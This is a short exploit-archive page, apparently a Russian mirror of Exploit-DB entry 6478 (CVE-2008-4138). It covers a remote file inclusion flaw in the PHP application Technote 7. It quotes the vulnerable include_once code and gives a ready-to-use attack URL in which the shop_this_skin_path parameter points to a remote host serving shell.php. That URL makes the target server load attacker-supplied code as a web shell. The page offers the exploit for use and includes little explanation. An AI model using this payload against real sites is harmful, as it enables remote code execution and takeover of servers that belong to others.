- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6478
- Проверка EDB
-
- Пройдено
- Автор
- WEBDEVIL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4138
- Дата публикации
- 2008-09-17
Код:
#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------Technote 7 Remote File Inclusion------------------------#
# ----------developers site: http://www.technote.co.kr--------------#
bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php
...snip...
$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
...snip...
include_once "$TWIN_SET[dir_path]/frame_design.php";
http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?
# milw0rm.com [2008-09-17]- Источник
- www.exploit-db.com
